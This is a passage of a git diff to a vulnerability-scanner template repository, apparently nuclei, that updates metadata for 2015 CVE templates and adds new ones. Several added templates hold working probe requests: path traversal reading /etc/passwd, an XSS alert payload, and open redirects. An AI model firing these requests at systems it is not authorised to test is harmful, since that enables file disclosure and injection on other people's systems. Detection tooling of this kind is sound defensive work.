+ description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.
reference:
- https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/
- https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/
@@ -12,7 +12,7 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2015-3224
classification:
cve-id: CVE-2015-3224
- tags: cve,cve2015,rce,rails,ruby
+ tags: ruby,hackerone,cve,cve2015,rce,rails
requests:
- method: GET
diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml
index f11c4e232d..80eee4953e 100644
--- a/cves/2015/CVE-2015-3306.yaml
+++ b/cves/2015/CVE-2015-3306.yaml
@@ -1,15 +1,19 @@
id: CVE-2015-3306
info:
- name: ProFTPd RCE
+ name: ProFTPd - Remote Code Execution
author: pdteam
severity: high
- description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
+ description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
reference:
- https://github.com/t0kx/exploit-CVE-2015-3306
+ - https://www.exploit-db.com/exploits/36803/
+ - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
+ - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-3306
classification:
cve-id: CVE-2015-3306
- tags: cve,cve2015,ftp,rce,network,proftpd
+ tags: cve,cve2015,ftp,rce,network,proftpd,edb
network:
- inputs:
@@ -31,3 +35,5 @@ network:
part: raw
words:
- "Copy successful"
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-3337.yaml b/cves/2015/CVE-2015-3337.yaml
index d4497a09bf..6a683cf9f6 100644
--- a/cves/2015/CVE-2015-3337.yaml
+++ b/cves/2015/CVE-2015-3337.yaml
@@ -1,15 +1,19 @@
id: CVE-2015-3337
info:
- name: Elasticsearch Head plugin LFI
+ name: Elasticsearch - Local File Inclusion
author: pdteam
severity: high
- description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
+ description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.
reference:
- https://www.exploit-db.com/exploits/37054/
+ - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385
+ - https://www.elastic.co/community/security
+ - http://www.debian.org/security/2015/dsa-3241
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-3337
classification:
cve-id: CVE-2015-3337
- tags: cve,cve2015,elastic,lfi,elasticsearch,plugin
+ tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin
requests:
- method: GET
@@ -26,3 +30,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-3648.yaml b/cves/2015/CVE-2015-3648.yaml
index 010991342b..efac6418d7 100644
--- a/cves/2015/CVE-2015-3648.yaml
+++ b/cves/2015/CVE-2015-3648.yaml
@@ -4,13 +4,16 @@ info:
name: ResourceSpace - Local File inclusion
author: pikpikcu
severity: high
- description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+ description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.
reference:
- https://vulners.com/cve/CVE-2015-3648/
- - https://www.securityfocus.com/bid/75019
+ - http://web.archive.org/web/20210122163815/https://www.securityfocus.com/bid/75019/
+ - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738
+ - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-3648
classification:
cve-id: CVE-2015-3648
- tags: cve,cve2015,lfi,resourcespace
+ tags: lfi,resourcespace,packetstorm,cve,cve2015
requests:
- method: GET
@@ -27,3 +30,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-3897.yaml b/cves/2015/CVE-2015-3897.yaml
index bbda5dbfa1..5090eb4c33 100644
--- a/cves/2015/CVE-2015-3897.yaml
+++ b/cves/2015/CVE-2015-3897.yaml
@@ -1,20 +1,21 @@
id: CVE-2015-3897
info:
- name: Bonita BPM 6.5.1 - Unauthenticated Directory Traversal
+ name: Bonita BPM Portal <6.5.3 - Local File Inclusion
author: 0x_Akoko
severity: high
- description: Directory traversal vulnerability in Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
+ description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.
reference:
- https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html
- https://www.bonitasoft.com/
- https://nvd.nist.gov/vuln/detail/CVE-2015-3897
+ - https://www.htbridge.com/advisory/HTB23259
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-3897
cwe-id: CWE-22
- tags: cve,cve2015,bonita,lfi,unauth
+ tags: unauth,packetstorm,cve,cve2015,bonita,lfi
requests:
- method: GET
@@ -36,3 +37,5 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0:"
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-4050.yaml b/cves/2015/CVE-2015-4050.yaml
index 2d3be7d772..29900ea2bc 100644
--- a/cves/2015/CVE-2015-4050.yaml
+++ b/cves/2015/CVE-2015-4050.yaml
@@ -1,12 +1,14 @@
id: CVE-2015-4050
info:
- name: ESI unauthorized access
+ name: Symfony - Authentication Bypass
author: ELSFA7110,meme-lord
severity: high
- description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment.
+ description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component.
reference:
- https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
+ - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access
+ - http://www.debian.org/security/2015/dsa-3276
- https://nvd.nist.gov/vuln/detail/CVE-2015-4050
classification:
cve-id: CVE-2015-4050
@@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-4074.yaml b/cves/2015/CVE-2015-4074.yaml
new file mode 100644
index 0000000000..ec54af72e6
--- /dev/null
+++ b/cves/2015/CVE-2015-4074.yaml
@@ -0,0 +1,36 @@
+id: CVE-2015-4074
+
+info:
+ name: Joomla Helpdesk Pro plugin <1.4.0 - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
+ reference:
+ - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html
+ - https://www.exploit-db.com/exploits/37666/
+ - https://www.cvedetails.com/cve/CVE-2015-4074
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-4074
+ cwe-id: CWE-22
+ tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by cs on 2022/09/08
diff --git a/cves/2015/CVE-2015-4127.yaml b/cves/2015/CVE-2015-4127.yaml
new file mode 100644
index 0000000000..5d59f8802d
--- /dev/null
+++ b/cves/2015/CVE-2015-4127.yaml
@@ -0,0 +1,39 @@
+id: CVE-2015-4127
+
+info:
+ name: WordPress Church Admin <0.810 - Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: |
+ WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
+ reference:
+ - https://www.exploit-db.com/exploits/37112
+ - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
+ - https://wordpress.org/plugins/church-admin/changelog/
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
+ classification:
+ cve-id: CVE-2015-4127
+ tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2015/CVE-2015-4414.yaml b/cves/2015/CVE-2015-4414.yaml
index c3363598a6..9d4911c858 100644
--- a/cves/2015/CVE-2015-4414.yaml
+++ b/cves/2015/CVE-2015-4414.yaml
@@ -1,16 +1,20 @@
id: CVE-2015-4414
info:
- name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
+ name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
author: daffainfo
severity: high
- description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/37274
- - https://www.cvedetails.com/cve/CVE-2015-4414
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-4414
+ - https://www.exploit-db.com/exploits/37274/
+ - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
classification:
cve-id: CVE-2015-4414
- tags: cve,cve2015,wordpress,wp-plugin,lfi
+ metadata:
+ google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
+ tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm
requests:
- method: GET
@@ -27,3 +31,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-4632.yaml b/cves/2015/CVE-2015-4632.yaml
index d34c15d8b4..e0c29e86de 100644
--- a/cves/2015/CVE-2015-4632.yaml
+++ b/cves/2015/CVE-2015-4632.yaml
@@ -4,17 +4,17 @@ info:
name: Koha 3.20.1 - Directory Traversal
author: daffainfo
severity: high
- description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via
- a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
+ description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
reference:
- https://www.exploit-db.com/exploits/37388
- https://www.cvedetails.com/cve/CVE-2015-4632
+ - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-4632
cwe-id: CWE-22
- tags: cve,cve2015,lfi
+ tags: cve,cve2015,lfi,edb
requests:
- method: GET
@@ -30,4 +30,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-4666.yaml b/cves/2015/CVE-2015-4666.yaml
new file mode 100644
index 0000000000..374b84c7b5
--- /dev/null
+++ b/cves/2015/CVE-2015-4666.yaml
@@ -0,0 +1,35 @@
+id: CVE-2015-4666
+
+info:
+ name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.
+ reference:
+ - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
+ - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-4666
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-4666
+ cwe-id: CWE-22
+ tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2015/CVE-2015-4668.yaml b/cves/2015/CVE-2015-4668.yaml
new file mode 100644
index 0000000000..5b44654f51
--- /dev/null
+++ b/cves/2015/CVE-2015-4668.yaml
@@ -0,0 +1,30 @@
+id: CVE-2015-4668
+
+info:
+ name: Xsuite 2.4.4.5 - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: |
+ Open redirect vulnerability in Xsuite 2.4.4.5 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirurl parameter.
+ reference:
+ - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
+ - https://www.cvedetails.com/cve/CVE-2015-4668
+ - https://vuldb.com/?id.107082
+ - https://www.exploit-db.com/exploits/37708/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2015-4668
+ cwe-id: CWE-601
+ tags: cve,cve2015,redirect,xsuite,xceedium,edb
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2015/CVE-2015-4694.yaml b/cves/2015/CVE-2015-4694.yaml
index f116177a76..62cb6ae9ef 100644
--- a/cves/2015/CVE-2015-4694.yaml
+++ b/cves/2015/CVE-2015-4694.yaml
@@ -9,12 +9,15 @@ info:
- https://wordpress.org/plugins/zip-attachments/#developers
- https://wpscan.com/vulnerability/8047
- https://nvd.nist.gov/vuln/detail/CVE-2015-4694
+ - http://www.vapid.dhs.org/advisory.php?v=126
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2015-4694
cwe-id: CWE-22
- tags: lfi,wordpress,cve,cve2015,wp-plugin
+ metadata:
+ google-query: inurl:"/wp-content/plugins/zip-attachments"
+ tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve
requests:
- method: GET
diff --git a/cves/2015/CVE-2015-5354.yaml b/cves/2015/CVE-2015-5354.yaml
new file mode 100644
index 0000000000..f20d2dfa3f
--- /dev/null
+++ b/cves/2015/CVE-2015-5354.yaml
@@ -0,0 +1,31 @@
+id: CVE-2015-5354
+
+info:
+ name: Novius OS 5.0.1-elche - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
+ reference:
+ - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
+ - https://vuldb.com/?id.76181
+ - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
+ - https://nvd.nist.gov/vul n/detail/CVE-2015-5354
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2015-5354
+ cwe-id: CWE-601
+ tags: packetstorm,cve,cve2015,redirect,novius
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml
index b6140bbf57..5c54d1362f 100644
--- a/cves/2015/CVE-2015-5461.yaml
+++ b/cves/2015/CVE-2015-5461.yaml
@@ -8,17 +8,21 @@ info:
reference:
- https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16
- https://nvd.nist.gov/vuln/detail/CVE-2015-5461
+ - https://wordpress.org/plugins/stageshow/changelog/
+ - http://seclists.org/fulldisclosure/2015/Jul/27
classification:
cve-id: CVE-2015-5461
- tags: redirect,cve,cve2015,wordpress,wp-plugin
+ metadata:
+ google-query: inurl:"/wp-content/plugins/stageshow/"
+ tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
+ - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2015/CVE-2015-5469.yaml b/cves/2015/CVE-2015-5469.yaml
new file mode 100644
index 0000000000..e62b890c74
--- /dev/null
+++ b/cves/2015/CVE-2015-5469.yaml
@@ -0,0 +1,33 @@
+id: CVE-2015-5469
+info:
+ name: Wordpress MDC YouTube Downloader plugin v2.1.0 - Remote file download
+ author: 0x_Akoko
+ severity: high
+ description: Absolute path traversal vulnerability in the MDC YouTube Downloader plugin 2.1.0 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter to includes/download.php.
+ reference:
+ - https://www.openwall.com/lists/oss-security/2015/07/10/5
+ - https://www.cvedetails.com/cve/CVE-2015-5469/
+ - http://www.vapid.dhs.org/advisory.php?v=133
+ - http://www.openwall.com/lists/oss-security/2015/07/10/5
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-5469
+ cwe-id: CWE-22
+ tags: cve,cve2015,wp,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2015/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml
index 25e4883dfb..e59da8f5da 100644
--- a/cves/2015/CVE-2015-5471.yaml
+++ b/cves/2015/CVE-2015-5471.yaml
@@ -9,13 +9,16 @@ info:
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
- http://www.vapid.dhs.org/advisory.php?v=134
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
+ - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html
+ remediation: Upgrade to Swim Team version 1.45 or newer.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2015-5471
cwe-id: CWE-22
- remediation: Upgrade to Swim Team version 1.45 or newer.
- tags: cve,cve2015,wordpress,wp-plugin,lfi
+ metadata:
+ google-query: inurl:"/wp-content/plugins/wp-swimteam"
+ tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm
requests:
- method: GET
diff --git a/cves/2015/CVE-2015-5531.yaml b/cves/2015/CVE-2015-5531.yaml
index 625872fd17..5b2fae0e33 100644
--- a/cves/2015/CVE-2015-5531.yaml
+++ b/cves/2015/CVE-2015-5531.yaml
@@ -1,16 +1,18 @@
id: CVE-2015-5531
info:
- name: ElasticSearch directory traversal vulnerability (CVE-2015-5531)
+ name: ElasticSearch <1.6.1 - Local File Inclusion
author: princechaddha
severity: high
- description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
+ description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
reference:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
- https://nvd.nist.gov/vuln/detail/CVE-2015-5531
+ - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html
+ - https://www.elastic.co/community/security/
classification:
cve-id: CVE-2015-5531
- tags: cve,cve2015,elasticsearch
+ tags: vulhub,packetstorm,cve,cve2015,elasticsearch
requests:
- raw:
@@ -53,3 +55,5 @@ requests:
- type: status
status:
- 400
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml
index 55e9b3a63c..f4dac34607 100644
--- a/cves/2015/CVE-2015-5688.yaml
+++ b/cves/2015/CVE-2015-5688.yaml
@@ -1,13 +1,15 @@
id: CVE-2015-5688
info:
- name: Geddy before v13.0.8 LFI
+ name: Geddy <13.0.8 - Local File Inclusion
author: pikpikcu
severity: high
- description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
+ description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
reference:
- https://nodesecurity.io/advisories/geddy-directory-traversal
- https://github.com/geddy/geddy/issues/697
+ - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-5688
classification:
cve-id: CVE-2015-5688
tags: cve,cve2015,geddy,lfi
@@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-6477.yaml b/cves/2015/CVE-2015-6477.yaml
index ec71bd0334..a14472ddd7 100644
--- a/cves/2015/CVE-2015-6477.yaml
+++ b/cves/2015/CVE-2015-6477.yaml
@@ -1,17 +1,17 @@
id: CVE-2015-6477
info:
- name: Nordex NC2 'username' Parameter XSS
+ name: Nordex NC2 - Cross-Site Scripting
author: geeknik
severity: medium
- description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://seclists.org/fulldisclosure/2015/Dec/117
- https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
- https://nvd.nist.gov/vuln/detail/CVE-2015-6477
classification:
cve-id: CVE-2015-6477
- tags: cve,cve2015,xss,iot,nordex,nc2
+ tags: xss,iot,nordex,nc2,seclists,cve,cve2015
requests:
- method: POST
@@ -30,3 +30,5 @@ requests:
part: body
words:
- ""
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml
index 2babac827a..61f14ea40b 100644
--- a/cves/2015/CVE-2015-6544.yaml
+++ b/cves/2015/CVE-2015-6544.yaml
@@ -1,12 +1,15 @@
id: CVE-2015-6544
info:
- name: iTop XSS
+ name: Combodo iTop <2.2.0-2459 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
- Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
+ Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
reference:
+ - https://www.htbridge.com/advisory/HTB23268
+ - http://sourceforge.net/p/itop/tickets/1114/
+ - http://sourceforge.net/p/itop/code/3662/
- https://nvd.nist.gov/vuln/detail/CVE-2015-6544
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +38,5 @@ requests:
part: header
words:
- text/html
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-6920.yaml b/cves/2015/CVE-2015-6920.yaml
index 8646c46d41..473b0a70fd 100644
--- a/cves/2015/CVE-2015-6920.yaml
+++ b/cves/2015/CVE-2015-6920.yaml
@@ -1,16 +1,17 @@
id: CVE-2015-6920
info:
- name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
+ name: WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
+ description: WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.
reference:
- - https://packetstormsecurity.com/files/133371/
+ - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html
+ - https://wpvulndb.com/vulnerabilities/8169
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920
classification:
cve-id: CVE-2015-6920
- tags: cve,cve2015,wordpress,wp-plugin,xss
+ tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress
requests:
- method: GET
@@ -32,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-7245.yaml b/cves/2015/CVE-2015-7245.yaml
new file mode 100644
index 0000000000..8232e6846b
--- /dev/null
+++ b/cves/2015/CVE-2015-7245.yaml
@@ -0,0 +1,32 @@
+id: CVE-2015-7245
+
+info:
+ name: D-Link DVG-N5402SP - Path Traversal
+ author: 0x_Akoko
+ severity: high
+ description: |
+ Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+ reference:
+ - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+ - https://www.exploit-db.com/exploits/39409/
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-7245
+ cwe-id: CWE-22
+ tags: cve,cve2015,dlink,lfi,packetstorm,edb
+
+requests:
+ - raw:
+ - |
+ POST /cgibin/webproc HTTP/1.1
+ Host: {{Hostname}}
+
+ getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
diff --git a/cves/2015/CVE-2015-7297.yaml b/cves/2015/CVE-2015-7297.yaml
